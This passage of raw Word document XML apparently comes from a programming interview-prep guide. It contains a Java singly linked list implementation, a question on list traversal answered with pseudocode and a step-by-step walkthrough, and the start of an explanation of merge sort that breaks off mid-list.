    <w:p w14:paraId="10E1988F"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this.next = null;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39A66D35"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40B85A21"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B666F96" w14:textId="77777777" w:rsidR="00315CE3" w:rsidRPr="004E1F60" w:rsidRDefault="00315CE3" w:rsidP="004E1F60">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="23D3D843"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public class MyLinkedList {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="111C451B"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Node head;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0493CA38" w14:textId="77777777" w:rsidR="00315CE3" w:rsidRPr="004E1F60" w:rsidRDefault="00315CE3" w:rsidP="004E1F60">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="34C17CAB"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 Add at end</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DD87A0B"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public void add(int data) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74CEF499"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Node newNode = new Node(data);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="428A947B"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if (head == null) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="596F191C"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head = newNode;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16232CA1"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return;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E73CDB7"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1BA7CC49"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Node temp = head;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F54C817"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while (temp.next != null) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="428CDD57"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temp = temp.next;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31143B48"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7033097A"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temp.next = newNode;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70FF82BB"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1547320D" w14:textId="77777777" w:rsidR="00315CE3" w:rsidRPr="004E1F60" w:rsidRDefault="00315CE3" w:rsidP="004E1F60">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6757E8C6"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 Print list</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3289DBC8"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public void printList() {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DC1580D"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Node temp = head;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D5BE71B"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while (temp != null) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39BDBE5E"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System.out.print(temp.data + " -&gt; ");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F3CE188"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temp = temp.next;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DA4FFE4"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DF98D5E"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lastRenderedPageBreak/>
        <w:t xml:space="preserve">        System.out.println("null");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49B12A30"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CAC4184" w14:textId="77777777" w:rsidR="00315CE3" w:rsidRPr="004E1F60" w:rsidRDefault="00315CE3" w:rsidP="004E1F60">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="675A22C4"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 Delete by value</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07F4B3CA"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public void delete(int value) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51A20627"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if (head == null) return;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FD2E1BB"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if (head.data == value) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="682A9B6C"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head = head.next;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45996BEE"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return;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29CE604E"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D5157D1"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Node curr = head;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64A2D1B4"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while (curr.next != null &amp;&amp; curr.next.data != value) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5553CC11"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curr = curr.next;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0AC894AD"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BFC64EC"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if (curr.next != null) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CB894CB"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curr.next = curr.next.next;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4030E82B"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F478AD8"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66A65669"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="164DE119" w14:textId="77777777" w:rsidR="00315CE3" w:rsidRPr="004E1F60" w:rsidRDefault="00315CE3" w:rsidP="004E1F60">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004E1F60">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Usage:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44C14596"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public class Main {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45976C99"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public static void main(String[] args) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D2E1301"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MyLinkedList list = new MyLinkedList();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B9BFD02"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list.add(10);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A4601EE"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list.add(20);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2AC4D6E3"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list.add(30);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C748A9F"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list.printList();   // 10 -&gt; 20 -&gt; 30 -&gt; null</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DF6CC86" w14:textId="77777777" w:rsidR="00315CE3" w:rsidRPr="004E1F60" w:rsidRDefault="00315CE3" w:rsidP="004E1F60">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="00113DEC"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list.delete(20);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30814959"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list.printList();   // 10 -&gt; 30 -&gt; null</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6AE7A12A"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="531EBAD3"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5CF20026" w14:textId="77777777" w:rsidR="00315CE3" w:rsidRPr="004E1F60" w:rsidRDefault="00315CE3"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This demonstrates how a singly linked list works under the hood with add, delete, and traversal operations.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="103F67BA" w14:textId="04E2B5D4" w:rsidR="00D86B77" w:rsidRPr="00CE4B95" w:rsidRDefault="00000000" w:rsidP="00D86B7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C911516">
          <v:rect id="_x0000_i1991" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="08C8F317" w14:textId="3EFCB3E9" w:rsidR="00E74B00" w:rsidRPr="00CE4B95" w:rsidRDefault="00253D26">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="412" w:name="_Toc196307892"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>How will you traverse LinkedList? Your List will contains multiple nodes so how will you traverse over it? Can you write a pseudo code? You have your head with you so how will you move to the next node? How will the current node be null</w:t>
      </w:r>
      <w:r w:rsidR="00E74B00" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="412"/>
    </w:p>
    <w:p w14:paraId="53518D2E" w14:textId="6884D70B" w:rsidR="009A5AFB" w:rsidRPr="004E1F60" w:rsidRDefault="009A5AFB" w:rsidP="004E1F60">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:num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To traverse a singly linked list, you start from the head node and move one node at a time using the .next reference until you reach the end (null).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7AA1F586" w14:textId="77777777" w:rsidR="009A5AFB" w:rsidRPr="004E1F60" w:rsidRDefault="00000000" w:rsidP="004E1F6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DD4F5A9">
          <v:rect id="_x0000_i1992" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="32551163" w14:textId="77777777" w:rsidR="009A5AFB" w:rsidRPr="004E1F60" w:rsidRDefault="009A5AFB" w:rsidP="004E1F60">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004E1F60">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI Emoji" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Segoe UI Emoji" w:cs="Segoe UI Emoji"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>✅</w:t>
      </w:r>
      <w:r w:rsidRPr="004E1F60">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> Pseudocode to Traverse a Singly Linked List:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0488D89D" w14:textId="77777777" w:rsidR="009A5AFB" w:rsidRPr="004E1F60" w:rsidRDefault="009A5AFB"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function traverseLinkedList(head):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10EAA3C1" w14:textId="77777777" w:rsidR="009A5AFB" w:rsidRPr="004E1F60" w:rsidRDefault="009A5AFB"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current = head</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1498D6BE" w14:textId="77777777" w:rsidR="009A5AFB" w:rsidRPr="004E1F60" w:rsidRDefault="009A5AFB"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while current is not null:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4672F045" w14:textId="77777777" w:rsidR="009A5AFB" w:rsidRPr="004E1F60" w:rsidRDefault="009A5AFB"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print current.data</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42785837" w14:textId="77777777" w:rsidR="009A5AFB" w:rsidRPr="004E1F60" w:rsidRDefault="009A5AFB"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 xml:space="preserve">        current = current.next</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DDD04F5" w14:textId="77777777" w:rsidR="009A5AFB" w:rsidRPr="004E1F60" w:rsidRDefault="00000000" w:rsidP="004E1F6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DE151E7">
          <v:rect id="_x0000_i1993" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="4313EFB7" w14:textId="77777777" w:rsidR="009A5AFB" w:rsidRPr="004E1F60" w:rsidRDefault="009A5AFB" w:rsidP="004E1F60">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004E1F60">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI Emoji" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Segoe UI Emoji" w:cs="Segoe UI Emoji"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>✅</w:t>
      </w:r>
      <w:r w:rsidRPr="004E1F60">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> Explanation:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6EE0089C" w14:textId="77777777" w:rsidR="009A5AFB" w:rsidRPr="004E1F60" w:rsidRDefault="009A5AFB" w:rsidP="004E1F60">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1824"/>
        </w:num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current is a pointer used to iterate over the list.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23B72D4D" w14:textId="77777777" w:rsidR="009A5AFB" w:rsidRPr="004E1F60" w:rsidRDefault="009A5AFB" w:rsidP="004E1F60">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1824"/>
        </w:num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current = current.next moves the pointer to the next node.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4551BAB7" w14:textId="77777777" w:rsidR="009A5AFB" w:rsidRPr="004E1F60" w:rsidRDefault="009A5AFB" w:rsidP="004E1F60">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1824"/>
        </w:num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When current becomes null, it means you’ve reached the end of the list.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B74CCDA" w14:textId="77777777" w:rsidR="009A5AFB" w:rsidRPr="004E1F60" w:rsidRDefault="00000000" w:rsidP="004E1F6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80FC7FB">
          <v:rect id="_x0000_i1994" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="7AE3C73F" w14:textId="77777777" w:rsidR="009A5AFB" w:rsidRPr="004E1F60" w:rsidRDefault="009A5AFB" w:rsidP="004E1F60">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004E1F60">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI Emoji" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Segoe UI Emoji" w:cs="Segoe UI Emoji"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>✅</w:t>
      </w:r>
      <w:r w:rsidRPr="004E1F60">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> Example Walkthrough:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F5FA610" w14:textId="77777777" w:rsidR="009A5AFB" w:rsidRPr="004E1F60" w:rsidRDefault="009A5AFB"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Given LinkedList:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6372761F" w14:textId="77777777" w:rsidR="009A5AFB" w:rsidRPr="004E1F60" w:rsidRDefault="009A5AFB"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lastRenderedPageBreak/>
        <w:t>10 -&gt; 20 -&gt; 30 -&gt; null</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="392A79F3" w14:textId="77777777" w:rsidR="009A5AFB" w:rsidRPr="004E1F60" w:rsidRDefault="009A5AFB" w:rsidP="004E1F60">
      <w:p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Steps:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D952E54" w14:textId="77777777" w:rsidR="009A5AFB" w:rsidRPr="004E1F60" w:rsidRDefault="009A5AFB" w:rsidP="004E1F60">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1825"/>
        </w:num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current = head → points to 10</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F1F1831" w14:textId="77777777" w:rsidR="009A5AFB" w:rsidRPr="004E1F60" w:rsidRDefault="009A5AFB" w:rsidP="004E1F60">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1825"/>
        </w:num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Print 10, move to current = current.next → points to 20</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76EFFB2C" w14:textId="77777777" w:rsidR="009A5AFB" w:rsidRPr="004E1F60" w:rsidRDefault="009A5AFB" w:rsidP="004E1F60">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1825"/>
        </w:num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Print 20, move to 30</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F83ABFC" w14:textId="77777777" w:rsidR="009A5AFB" w:rsidRPr="004E1F60" w:rsidRDefault="009A5AFB" w:rsidP="004E1F60">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1825"/>
        </w:num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Print 30, move to null</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2969DD0E" w14:textId="77777777" w:rsidR="009A5AFB" w:rsidRPr="004E1F60" w:rsidRDefault="009A5AFB" w:rsidP="004E1F60">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1825"/>
        </w:num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Loop ends</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D523B53" w14:textId="77777777" w:rsidR="009A5AFB" w:rsidRPr="004E1F60" w:rsidRDefault="00000000" w:rsidP="004E1F6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077E9CF">
          <v:rect id="_x0000_i1995" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="36BAC5CE" w14:textId="77777777" w:rsidR="009A5AFB" w:rsidRPr="004E1F60" w:rsidRDefault="009A5AFB" w:rsidP="004E1F60">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004E1F60">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI Emoji" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Segoe UI Emoji" w:cs="Segoe UI Emoji"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>✅</w:t>
      </w:r>
      <w:r w:rsidRPr="004E1F60">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> When will the current node be null?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="364343D5" w14:textId="77777777" w:rsidR="009A5AFB" w:rsidRPr="004E1F60" w:rsidRDefault="009A5AFB" w:rsidP="004E1F60">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1826"/>
        </w:num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When you’ve traversed past the last node (current.next is null), assigning current = current.next sets current to null.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D8E0D9B" w14:textId="77777777" w:rsidR="009A5AFB" w:rsidRPr="004E1F60" w:rsidRDefault="009A5AFB" w:rsidP="004E1F60">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1826"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004E1F60">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>This is the termination condition of the loop.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6113F076" w14:textId="794D278E" w:rsidR="00D86B77" w:rsidRPr="00CE4B95" w:rsidRDefault="00000000" w:rsidP="00D86B7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49593A1">
          <v:rect id="_x0000_i1996" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="63EF7676" w14:textId="27CCF083" w:rsidR="00E74B00" w:rsidRPr="00CE4B95" w:rsidRDefault="0038291C">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="413" w:name="_Toc196307893"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>Explain Merge Sort</w:t>
      </w:r>
      <w:r w:rsidR="00E74B00" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="413"/>
    </w:p>
    <w:p w14:paraId="20F476D9" w14:textId="6080F347" w:rsidR="00972CB4" w:rsidRPr="001749BC" w:rsidRDefault="00972CB4" w:rsidP="001749BC">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001749BC">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Merge Sort</w:t>
      </w:r>
      <w:r w:rsidRPr="001749BC">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> is a </w:t>
      </w:r>
      <w:r w:rsidRPr="001749BC">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Divide and Conquer</w:t>
      </w:r>
      <w:r w:rsidRPr="001749BC">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> algorithm that:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D802392" w14:textId="77777777" w:rsidR="00972CB4" w:rsidRPr="001749BC" w:rsidRDefault="00972CB4" w:rsidP="001749BC">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1827"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001749BC">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Divides</w:t>
      </w:r>
      <w:r w:rsidRPr="001749BC">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> the array into two halves,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17E16F7C" w14:textId="77777777" w:rsidR="00972CB4" w:rsidRPr="001749BC" w:rsidRDefault="00972CB4" w:rsidP="001749BC">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1827"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001749BC">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
